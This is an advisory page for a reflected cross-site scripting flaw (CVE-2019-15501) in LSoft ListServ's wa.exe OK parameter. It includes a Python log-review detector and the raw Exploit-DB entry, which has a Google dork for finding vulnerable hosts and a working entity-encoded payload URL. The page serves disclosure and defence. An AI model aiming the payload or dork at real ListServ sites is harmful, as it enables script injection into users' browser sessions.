Vendor: ListServ
By: MTK
CVSS: 6.1 (MEDIUM)
CWE: 79 - Cross-Site Scripting (XSS)
Product Name: ListServ
Affected Version From: Older than Ver 16.5-2018a
Affected Version To: 16.5-2018a
Patch Exists: YES
Related CVE: CVE-2019-15501
CPE: a:lsoft:listserv
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: IIS 8.5/10.0 - Firefox/Windows
Year: 2019

LSoft ListServ < 16.5 - Cross-Site Scripting (XSS)

The term Listserv has been used to refer to electronic mailing list software applications in general, but it is more properly applied to a few early instances of such software. It allows a sender to send one email to the list and then transparently forwards it to the addresses of the list's subscribers. The vulnerability exists in the wa.exe script, which allows an attacker to inject malicious payloads into the OK parameter. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected site.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of LSoft ListServ.
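
For log review on hosts that have not been upgraded yet, the following is an added example (not part of the original advisory and not LISTSERV code). It URL-decodes and then HTML-entity-decodes the OK parameter of wa.exe requests, so the entity-encoded form used in the PoC listed on this page is seen as plain markup. The function names, the case-insensitive match on the parameter name, and the premise that legitimate OK values never contain markup are assumptions of this example.

```python
import html
import re
from urllib.parse import unquote_plus, urlsplit

# Markup indicators looked for after decoding: tag brackets, inline event
# handlers (onload=, onerror=, ...) and javascript: URLs.
MARKUP = re.compile(r"[<>]|\bon\w+\s*=|javascript:", re.IGNORECASE)

# First URL is the PoC from this page; the second is constructed benign traffic.
PAGE_POC = "http://127.0.0.1/scripts/wa.exe?OK=<svg/onload=%26%23097lert%26lpar;'MTK')>"
CONSTRUCTED_BENIGN = "http://127.0.0.1/scripts/wa.exe?OK=12345ABC&L=EXAMPLE-L"


def decode_layers(value, max_rounds=3):
    """Apply HTML-entity decoding until the value stops changing."""
    for _ in range(max_rounds):
        decoded = html.unescape(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_ok_parameter(url):
    """Return decoded OK values of a wa.exe request that contain markup."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/wa.exe"):
        return []
    hits = []
    for pair in parts.query.split("&"):
        key, _, raw = pair.partition("=")
        # Assumption: the parameter name is matched case-insensitively.
        if unquote_plus(key).upper() != "OK":
            continue
        # Step 1: URL-decode (%26 -> &, %23 -> #). Step 2: entity-decode.
        decoded = decode_layers(unquote_plus(raw))
        if MARKUP.search(decoded):
            hits.append(decoded)
    return hits


if __name__ == "__main__":
    for url in (PAGE_POC, CONSTRUCTED_BENIGN):
        print(url, "->", flag_ok_parameter(url) or "clean")
```

To use it on IIS logs, rebuild each request as the logged path plus "?" plus the logged query string and pass that to `flag_ok_parameter`.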

Exploit-DB raw data:

# Exploit Title: LSoft ListServ < 16.5 - Cross-Site Scripting (XSS)
# Google Dork: intitle:LISTSERV 16.5
# Date: 08-21-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: http://www.lsoft.com/
# Software Link: http://www.lsoft.com/products/listserv.asp
# Version: Older than Ver 16.5-2018a
# Tested on: IIS 8.5/10.0 - Firefox/Windows
# CVE : CVE-2019-15501

# Software description:
The term Listserv has been used to refer to electronic mailing list software applications in general, 
but is more properly applied to a few early instances of such software, which allows a sender to send one 
email to the list, and then transparently sends it on to the addresses of the subscribers to the list. 

# POC

1. 	http://127.0.0.1/scripts/wa.exe?OK=<PAYLOAD>
2.	http://127.0.0.1/scripts/wa.exe?OK=<svg/onload=%26%23097lert%26lpar;'MTK')>

# References:
1.	http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
2.	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501